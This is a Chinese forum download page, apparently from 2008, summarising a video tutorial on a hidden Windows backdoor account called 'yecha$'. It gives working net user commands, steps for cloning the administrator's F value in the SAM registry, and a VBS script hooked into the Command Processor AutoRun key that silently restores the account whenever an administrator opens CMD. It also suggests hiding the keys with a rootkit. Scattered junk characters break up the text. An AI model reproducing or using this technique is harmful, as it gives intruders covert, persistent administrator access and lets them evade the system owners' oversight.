创建不死帐号

软件简介：
1 h* n1 X2 P7 C  `# n大家好，今天给大家做的动画是建立不死帐户。

. O! {) Z; Y% J4 A/ h1.首先我们在DOS下建立一个用户
6 [5 u' D6 T5 p( o9 k- q3 mnet user yecha$ yecha /add
! l6 |; I/ m1 k! Z5 m9 X建立用户yecha$
- _1 f. e" F' ]7 W9 f" \
net localgroup administrators yecha$ /add
1 ^9 G4 y+ f9 u& h4 j! r将yecha$提升到管理员组
2.接着打开注册表，输入：regedit，我们找到HKEY_LOCAL_MACHINE\SAM\SAM，这个时候SAM项是打不开的，我们要给他相应的权限。添加你现在登陆系统的用户，给他完全控制的权限，然后刷新，就可以打开！
0 g* M2 W9 i8 G# ~' UHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names 来到这里，我们找到刚刚建立的用户
yecha$。再将yecha$的相关项导出，yecha$对用的F值导出。最后导出administrator的F值。
3.在DOS下将yecha$用户删除，然后我们将administrator的F值复制给yecha$。
' ]( W/ g' V: g* D  w 将修改后的yecha$注册表信息导入注册表。

4.OK，这个时候大家可能会问这样做有什么意思呢？而且这种简单的建立帐户早就会了。当然我知道很多朋友都会这种方法来建立隐藏帐户，因为到了这一步的时候在CMD下和本地用户和组里都查看不到我们建立的这个用户！唯一存在的就是在我们的注册表里仍然有这个用户。
# @# d# i3 x% M1 S  R' [) A说到这里，我想到的就是两种思路:
- i  K- E! o4 R. T6 F一是想办法在注册表里将我们的这个用户所在注册表的键值隐藏。
' y+ c2 ?2 k( n. p- M二是管理员在注册表里把我们的这个用户所在注册表的键值删掉后，我们怎么能让它再自动创建。
第一种方法我不想讲了，如果大家这几天一直看我教程的话，就知道用rootkit就可以隐藏注册表键值。
; i' j* A+ z; i用ROOTKIT这款DOS下的超级隐藏工具完全可以轻松做到这一点！
第二种方法就是今天我讲到的。
KEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
4 c$ L( u' W: p  `/ g1 l+ [8 R# S在注册表中这个项起什么作用大家知道吗？没错，他起到的作用就是打开CMD自动运行我们编辑好的脚本文件。只要在AutoRun键值中输入我们的脚本路径就OK。
那我们可以建立一个自动导入注册表的脚本文件：
On Error Resume Next
set yecha=wscript.createobject(wscript.shell)
yecha.run regedit.exe /s yecha$.reg,0
yecha.run regedit.exe /s yechaF.reg,0
将它保存为VBS文件后，放到一个隐蔽的路径下。 好，这个时候我们手工把注册表里的yecha$这个键值删掉，模仿管理员的操作。 好，我们删掉，可是管理员会经常使用CMD命令查看一些信息，这个时候比如管理员要查看机器开了哪些端口，他就执行CMD命令.看，他刚刚打开CMD窗口，结果我们的用户信息又都回来了。。。怎么样？很好的方法吧？
4 H% M) a  v8 A这样当我们每次运行CMD命令的时候就会自动运行我们的脚本文件。思路就是这样了。
那我们实验以下，我们能用yecha$这个用户登陆不。等一下，机器有点卡了。没有问题！
好了，今天的教程就做到这，如果有什么不懂的可以加QQ群：47688744 新建不到4天。希望大家多来交流。。。
下载地址：

2008-8-19 13:46 上传 创建不死帐号.rar

下载权限:

版本vip会员

本地下载 检测资源   提取码: 需要终身vip或更高权限

有些游戏资源需要vip下载开通请点击开通vip